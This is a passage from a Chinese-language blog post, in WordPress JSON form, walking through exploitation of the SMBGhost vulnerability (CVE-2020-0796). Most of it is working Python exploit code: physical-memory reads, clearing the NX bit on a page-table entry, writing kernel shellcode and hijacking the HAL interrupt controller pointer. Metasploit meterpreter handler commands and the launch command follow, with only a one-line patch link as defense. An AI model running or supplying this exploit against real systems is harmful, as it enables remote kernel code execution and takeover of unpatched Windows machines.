get_phys_addr(ip, port, addr)\r\n\r\n    buff = read_physmem_primitive(ip, port, phys_addr)\r\n\r\n    if buff is None:\r\n        sys.exit(\"[-] read primitive failed!\")\r\n\r\n    pte_val = struct.unpack(\"<Q\", buff[0:8])[0]\r\n\r\n    # Clear NX bit\r\n    overwrite_val = pte_val & (((1 << 63) - 1))\r\n    overwrite_buff = struct.pack(\"<Q\", overwrite_val)\r\n\r\n    write_primitive(ip, port, overwrite_buff, addr)\r\n\r\n\r\ndef build_shellcode():\r\n    global KERNEL_SHELLCODE\r\n    KERNEL_SHELLCODE += struct.pack(\"<Q\", PHALP_INTERRUPT +\r\n                                    HALP_APIC_REQ_INTERRUPT_OFFSET)\r\n    KERNEL_SHELLCODE += struct.pack(\"<Q\", PHALP_APIC_INTERRUPT)\r\n    KERNEL_SHELLCODE += USER_PAYLOAD\r\n\r\n\r\ndef search_hal_heap(ip, port):\r\n    global PHALP_INTERRUPT\r\n    global PHALP_APIC_INTERRUPT\r\n    search_len = 0x10000\r\n\r\n    index = PHAL_HEAP\r\n    page_index = PHAL_HEAP\r\n    cons = 0\r\n    phys_addr = 0\r\n\r\n    while index < PHAL_HEAP + search_len:\r\n\r\n        # It seems that pages in the HAL heap are not necessarily contiguous in physical memory, \r\n        # so we try to reduce number of reads like this \r\n        \r\n        if not (index & 0xFFF):\r\n            phys_addr = get_phys_addr(ip, port, index)\r\n        else:\r\n            phys_addr = (phys_addr & 0xFFFFFFFFFFFFF000) + (index & 0xFFF)\r\n\r\n        buff = read_physmem_primitive(ip, port, phys_addr)\r\n\r\n        if buff is None:\r\n            sys.exit(\"[-] physical read primitive failed!\")\r\n\r\n        entry_indices = 8*(((len(buff) + 8 \/\/ 2) \/\/ 8) - 1)\r\n        i = 0\r\n        \r\n        # This heuristic seems to be OK to find HalpInterruptController, but could use improvement\r\n        while i < entry_indices:\r\n            entry = struct.unpack(\"<Q\", buff[i:i+8])[0]\r\n            i += 8\r\n            if (entry & 0xFFFFFF0000000000) != 0xFFFFF80000000000:\r\n                cons = 0\r\n                continue\r\n            cons += 1\r\n            if cons > 3:\r\n                PHALP_INTERRUPT = index + i - 0x40\r\n                print(\"[+] found HalpInterruptController at %lx\"\r\n                      % PHALP_INTERRUPT)\r\n\r\n                if len(buff) < i + 0x40:\r\n                    buff = read_physmem_primitive(ip, port, phys_addr + i + 0x38)\r\n                    PHALP_APIC_INTERRUPT = struct.unpack(\"<Q\", buff[0:8])[0]\r\n                    \r\n                    if buff is None:\r\n                        sys.exit(\"[-] physical read primitive failed!\")\r\n                else:\r\n                    PHALP_APIC_INTERRUPT = struct.unpack(\"<Q\",buff[i + 0x38:i+0x40])[0]\r\n                \r\n                print(\"[+] found HalpApicRequestInterrupt at %lx\" % PHALP_APIC_INTERRUPT)\r\n                \r\n                return\r\n        index += entry_indices\r\n\r\n    sys.exit(\"[-] failed to find HalpInterruptController!\")\r\n\r\n\r\ndef search_selfref(ip, port):\r\n    search_len = 0x1000\r\n    index = PML4\r\n\r\n    while search_len:\r\n        buff = read_physmem_primitive(ip, port, index)\r\n        if buff is None:\r\n            return\r\n        entry_indices = 8*(((len(buff) + 8 \/\/ 2) \/\/ 8) - 1)\r\n        i = 0\r\n        while i < entry_indices:\r\n            entry = struct.unpack(\"<Q\",buff[i:i+8])[0] & 0xFFFFF000\r\n            if entry == PML4:\r\n                return index + i\r\n            i += 8\r\n        search_len -= entry_indices\r\n        index += entry_indices\r\n\r\n\r\ndef find_pml4_selfref(ip, port):\r\n    global PML4_SELFREF\r\n    self_ref = search_selfref(ip, port)\r\n\r\n    if self_ref is None:\r\n        sys.exit(\"[-] failed to find PML4 self reference entry!\")\r\n\r\n    PML4_SELFREF = (self_ref & 0xFFF) >> 3\r\n\r\n    print(\"[+] found PML4 self-ref entry %0x\" % PML4_SELFREF)\r\n\r\n\r\ndef find_low_stub(ip, port):\r\n    global PML4\r\n    global PHAL_HEAP\r\n\r\n    limit = 0x100000\r\n    index = 0x1000\r\n\r\n    while index < limit:\r\n        buff = read_physmem_primitive(ip, port, index)\r\n\r\n        if buff is None:\r\n            sys.exit(\"[-] physical read primitive failed!\")\r\n\r\n        entry = struct.unpack(\"<Q\", buff[0:8])[0] & 0xFFFFFFFFFFFF00FF\r\n\r\n        if entry == LOWSTUB_JMP:\r\n            print(\"[+] found low stub at phys addr %lx!\" % index)\r\n            PML4 = struct.unpack(\"<Q\", buff[PML4_LOWSTUB_OFFSET: PML4_LOWSTUB_OFFSET + 8])[0]\r\n            print(\"[+] PML4 at %lx\" % PML4)\r\n            PHAL_HEAP = struct.unpack(\"<Q\", buff[SELFVA_LOWSTUB_OFFSET:SELFVA_LOWSTUB_OFFSET + 8])[0] & 0xFFFFFFFFF0000000\r\n            print(\"[+] base of HAL heap at %lx\" % PHAL_HEAP)\r\n            return\r\n\r\n        index += 0x1000\r\n\r\n    sys.exit(\"[-] Failed to find low stub in physical memory!\")\r\n\r\n\r\ndef do_rce(ip, port):\r\n    find_low_stub(ip, port)\r\n    find_pml4_selfref(ip, port)\r\n    search_hal_heap(ip, port)\r\n    \r\n    build_shellcode()\r\n\r\n    print(\"[+] built shellcode!\")\r\n\r\n    pKernelUserSharedPTE = get_pte_va(KUSER_SHARED_DATA)\r\n    print(\"[+] KUSER_SHARED_DATA PTE at %lx\" % pKernelUserSharedPTE)\r\n\r\n    overwrite_pte(ip, port, pKernelUserSharedPTE)\r\n    print(\"[+] KUSER_SHARED_DATA PTE NX bit cleared!\")\r\n    \r\n    # TODO: figure out why we can't write the entire shellcode data at once. There is a check before srv2!Srv2DecompressData preventing the call of the function.\r\n    to_write = len(KERNEL_SHELLCODE)\r\n    write_bytes = 0\r\n    while write_bytes < to_write:\r\n        write_sz = min([write_unit, to_write - write_bytes])\r\n        write_primitive(ip, port, KERNEL_SHELLCODE[write_bytes:write_bytes + write_sz], pshellcodeva + write_bytes)\r\n        write_bytes += write_sz\r\n    \r\n    print(\"[+] Wrote shellcode at %lx!\" % pshellcodeva)\r\n\r\n    input(\"[+] Press a key to execute shellcode!\")\r\n    \r\n    write_primitive(ip, port, struct.pack(\"<Q\", pshellcodeva), PHALP_INTERRUPT + HALP_APIC_REQ_INTERRUPT_OFFSET)\r\n    print(\"[+] overwrote HalpInterruptController pointer, should have execution shortly...\")\r\n    \r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    parser = argparse.ArgumentParser()\r\n    parser.add_argument(\"-ip\", help=\"IP address of target\", required=True)\r\n    parser.add_argument(\"-p\", \"--port\", default=445, help=\"SMB port, \\\r\n                        default: 445\", required=False, type=int)\r\n    args = parser.parse_args()\r\n\r\n    do_rce(args.ip, args.port)\r\n<\/code><\/pre>\n\n\n\n
2\u3001\u6253\u5f00Metasploit\uff0c\u5e76\u4e14\u8bbe\u7f6e\u76d1\u542c\u3002\u6ce8[4]<\/sup> \u6ce8\u610f\uff1a lport \u8981\u548cmsfvenom\u751f\u6210\u7684payload\u4fdd\u6301\u4e00\u81f4<\/sup><\/h3>\n\n\n\n
msfconsole\nuse exploit\/multi\/handler\r\nset payload windows\/x64\/meterpreter\/bind_tcp\r\nset lport 8888\r\nset rhost 192.168.110.131\r\nrun\r<\/code><\/pre>\n\n\n
\n
\"\"<\/figure>\n<\/div>\n\n\n
\u56fe6 \u5f00\u59cb\u76d1\u542c<\/p>\n\n\n\n
3\u3001\u4f7f\u7528\u4fee\u6539\u540e\u7684exploit.py\u653b\u51fb<\/h3>\n\n\n\n
python3 exploit.py -ip 192.168.110.131<\/code><\/pre>\n\n\n
\n
\"\"<\/figure>\n<\/div>\n\n\n
\u56fe7.1 exp\u653b\u51fb\u6210\u529f\u56de\u663e\u6ce8[3]\u5982\u679c\u5931\u8d25\u53ef\u4ee5\u591a\u8bd5\u51e0\u6b21<\/sup><\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u56fe7.2 Metasploit\u4e2d\u6210\u529f\u8fdb\u5165meterpreter\u6ce8[3]\u5982\u679c\u5931\u8d25\u53ef\u4ee5\u591a\u8bd5\u51e0\u6b21<\/sup><\/p>\n\n\n\n
\u7b2c5\u7ae0\u3001\u9632\u5fa1\u624b\u6bb5<\/h2>\n\n\n\n
\u9632\u5fa1\u624b\u6bb5\u6253\u8865\u4e01\uff1ahttps:\/\/msrc.microsoft.com\/update-guide\/en-US\/vulnerability\/CVE-2020-0796<\/a> \uff08windows\u5b98\u65b9\u8865\u4e01\uff09\u6ce8[5]<\/sup><\/p>\n\n\n\n
\u7b2c6\u7ae0\u3001\u603b\u7ed3\u53ca\u53c2\u8003\u6587\u732e\/\u7f51\u7ad9<\/h2>\n\n\n\n
\n
<\/p>\n1\u3001\u00a0 https:\/\/portal.msrc.microsoft.com\/en-US\/security-guidance\/advisory\/CVE-2020-0796<\/a>
2\u3001\u00a0 http:\/\/packetstormsecurity.com\/files\/156731\/CoronaBlue-SMBGhost-Microsoft-Windows-10-SMB-3.1.1-Proof-Of-Concept.html<\/a>
3\u3001\u00a0 http:\/\/packetstormsecurity.com\/files\/156732\/Microsoft-Windows-SMB-3.1.1-Remote-Code-Execution.html<\/a>
4\u3001\u00a0 http:\/\/packetstormsecurity.com\/files\/156980\/Microsoft-Windows-10-SMB-3.1.1-Local-Privilege-Escalation.html<\/a>
5\u3001\u00a0 http:\/\/packetstormsecurity.com\/files\/157110\/SMBv3-Compression-Buffer-Overflow.html<\/a>
6\u3001\u00a0 http:\/\/packetstormsecurity.com\/files\/157901\/Microsoft-Windows-SMBGhost-Remote-Code-Execution.html<\/a>
7\u3001\u00a0 http:\/\/packetstormsecurity.com\/files\/158054\/SMBleed-SMBGhost-Pre-Authentication-Remote-Code-Execution-Proof-Of-Concept.html<\/a>
8\u3001https:\/\/www.cnblogs.com\/MF-Blog\/p\/14211210.html<\/a><\/cite><\/blockquote>\n","protected":false},"excerpt":{"rendered":"CVE-2020-0796\u6f0f\u6d1e\u53d7\u5f71\u54cd\u7684\u7cfb\u7edf\u6709Windows Server, version 1909, Windows 10 Version 1909\u548cWindows 10 Version 1903\u7b49\u3002\u51c6\u5907\u5de5\u4f5c\u9700\u8981\u5b89\u88c5\u865a","protected":false},"author":12,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[10,9],"tags":[],"class_list":["post-309","post","type-post","status-publish","format-standard","hentry","category-10","category-9"],"_links":{"self":[{"href":"https:\/\/www.zjydiary.top\/index.php?rest_route=\/wp\/v2\/posts\/309","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.zjydiary.top\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.zjydiary.top\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.zjydiary.top\/index.php?rest_route=\/wp\/v2\/users\/12"}],"replies":[{"embeddable":true,"href":"https:\/\/www.zjydiary.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=309"}],"version-history":[{"count":2,"href":"https:\/\/www.zjydiary.top\/index.php?rest_route=\/wp\/v2\/posts\/309\/revisions"}],"predecessor-version":[{"id":319,"href":"https:\/\/www.zjydiary.top\/index.php?rest_route=\/wp\/v2\/posts\/309\/revisions\/319"}],"wp:attachment":[{"href":"https:\/\/www.zjydiary.top\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=309"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.zjydiary.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=309"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.zjydiary.top\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=309"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}